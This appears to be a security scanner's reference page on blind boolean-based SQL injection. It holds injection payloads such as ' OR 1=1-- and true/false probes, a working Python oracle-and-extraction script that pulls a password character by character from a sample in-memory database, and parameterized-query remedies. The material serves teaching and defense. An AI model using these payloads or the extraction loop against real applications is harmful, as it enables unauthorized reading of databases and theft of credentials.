SQL Injection: Blind Boolean Based
Severity: High
Test name: SQL Injection (SQLI)
Test ID: sqli
Summary
A SQL injection attack is the insertion (injection) of malicious SQL via the input data sent from a client to an application. As a result, an attacker can execute arbitrary SQL on the application's database with the access rights granted to the application's database account. This means the attacker can read, update, or delete sensitive data, or even perform administrative operations on the database server.
Blind Boolean Based SQL injection is a variant in which the application does not show query results or database errors in its response. The attacker instead injects a condition that evaluates to TRUE or FALSE and infers the answer from a difference in the application's behaviour (for example, whether a product list is shown or empty), which allows data to be extracted one bit or one character at a time.
Impact
This vulnerability allows an attacker to:
- Modify application data
- Bypass protection mechanism
- Read application data
Example
- The unprotected application executes the following query, which contains the user input Laptops and returns only active products for the selected category:
SELECT name, price FROM products WHERE category = 'Laptops' AND status = 'active'
- Instead of Laptops, an attacker can submit an input such as ' OR 1=1--. The single quote closes the string literal, OR 1=1 makes the WHERE clause always true, and -- turns the rest of the query into a comment. As a result, the application returns all products with any status. The following SQL will be executed (everything after -- is ignored by the database):
SELECT name, price FROM products WHERE category = '' OR 1=1--' AND status = 'active'
- The same injection point is exploited blind by submitting a condition rather than a tautology, for example Laptops' AND 1=1-- versus Laptops' AND 1=2--: the first input still lists laptops, the second returns an empty list, and that difference is the TRUE/FALSE oracle used to read data from the database.
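The following Python script is an added example, not code from the original page: it turns the injection point shown above into the blind boolean oracle the page describes. It uses a constructed in-memory SQLite database with a products table matching the example query, plus a hypothetical users table holding the value the attacker wants; the vulnerable search concatenates the category into the SQL text exactly as in the example, and the attacker observes only whether any products came back.

```python
import sqlite3

# Characters the attacker guesses at each position (no quote characters, so the
# injected condition itself stays syntactically valid).
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def build_db():
    """Constructed sample database; schema, rows and the users table are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, price REAL, category TEXT, status TEXT);
        INSERT INTO products VALUES ('ThinkPad X1', 1200, 'Laptops', 'active');
        INSERT INTO products VALUES ('Old Model',    300, 'Laptops', 'inactive');
        INSERT INTO products VALUES ('Pixel 8',      700, 'Phones',  'active');
        -- hypothetical table the attacker wants to read
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return conn


def vulnerable_search(conn, category):
    """The page's vulnerable pattern: user input concatenated into the SQL text."""
    sql = ("SELECT name, price FROM products "
           f"WHERE category = '{category}' AND status = 'active'")
    return conn.execute(sql).fetchall()


def oracle(conn, condition):
    """Blind boolean probe.

    The attacker never sees query results, only whether the page listed any
    products. Appending AND (<condition>)-- to a valid category makes that
    answer depend on the injected condition: rows come back only if it is TRUE.
    """
    payload = f"Laptops' AND ({condition})--"
    return len(vulnerable_search(conn, payload)) > 0


def extract(conn, expression, charset=CHARSET, max_len=64):
    """Recover the string value of an SQL expression one character at a time.

    Each position is tested against every candidate character with a TRUE/FALSE
    question; the first match is kept. An empty substr() matches no candidate,
    which marks the end of the value.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(conn, f"substr(({expression}), {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of string
    return recovered


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_search(db, "' OR 1=1--"))        # every product, any status
    print(oracle(db, "1=1"), oracle(db, "1=2"))       # True False
    print(extract(db, "SELECT password FROM users WHERE username = 'admin'"))
```

Each recovered character costs up to len(CHARSET) requests, which is why real-world blind extraction uses binary search over character codes instead of a linear scan; the oracle itself is the same.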
Location
The issue is in the server-side source code, wherever user-supplied input is concatenated into the text of a SQL query.
Remedy suggestions
- Use prepared statements with variable binding (also known as parameterized queries). With parameterized queries the developer first defines all of the SQL code and only then passes each parameter to the query. This lets the database distinguish code from data, regardless of what input a user supplies.
  - Java EE – use PreparedStatement() with bind variables
  - .NET – use parameterized queries such as SqlCommand() or OleDbCommand() with bind variables
  - PHP – use PDO with strongly typed parameterized queries (using bindParam())
  - Hibernate – use createQuery() with bind variables (called named parameters in Hibernate)
  - SQLite – use sqlite3_prepare() to create a statement object
- Avoid generating dynamic SQL inside stored procedures. If it cannot be avoided, the stored procedure must validate or properly escape all user-supplied input so that none of it can inject SQL code into the dynamically generated query.
- Apply the least privilege principle to provide defense in depth and limit the damage of a successful SQL injection. Minimize the privileges assigned to every database account in your environment, and never grant DBA or admin rights to application accounts. Least privilege limits what an injection can reach; only parameterization removes the injection itself.
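As an added example (not code from the original page) of the first remedy, the example query rewritten with a bound parameter in Python's sqlite3 module, which prepares the statement and binds the value through SQLite's C API, beside the vulnerable string-concatenated form for comparison. The products table and its rows are a constructed sample.

```python
import sqlite3


def build_db():
    """Constructed sample data; schema and rows are assumptions for this example."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, price REAL, category TEXT, status TEXT);
        INSERT INTO products VALUES ('ThinkPad X1', 1200, 'Laptops', 'active');
        INSERT INTO products VALUES ('Old Model',    300, 'Laptops', 'inactive');
        INSERT INTO products VALUES ('Pixel 8',      700, 'Phones',  'active');
    """)
    return conn


def unsafe_search(conn, category):
    """Vulnerable: the input becomes part of the SQL text that the parser sees."""
    sql = ("SELECT name, price FROM products "
           f"WHERE category = '{category}' AND status = 'active'")
    return conn.execute(sql).fetchall()


def safe_search(conn, category):
    """Prepared statement with a bound parameter.

    The SQL text is fixed before any input is seen; the driver hands the
    category to SQLite as a value, so a quote or '--' inside it is compared
    against the column, never parsed as SQL. An injection payload therefore
    simply matches no category.
    """
    sql = ("SELECT name, price FROM products "
           "WHERE category = ? AND status = 'active'")
    return conn.execute(sql, (category,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    for user_input in ("Laptops", "' OR 1=1--", "Laptops' AND 1=1--"):
        print(repr(user_input), unsafe_search(db, user_input), safe_search(db, user_input))
```

The same pattern applies to the other platforms listed above: the query text contains only placeholders, and every user-controlled value is supplied through the driver's bind call rather than spliced into the string.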
Classifications
- CWE-89
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N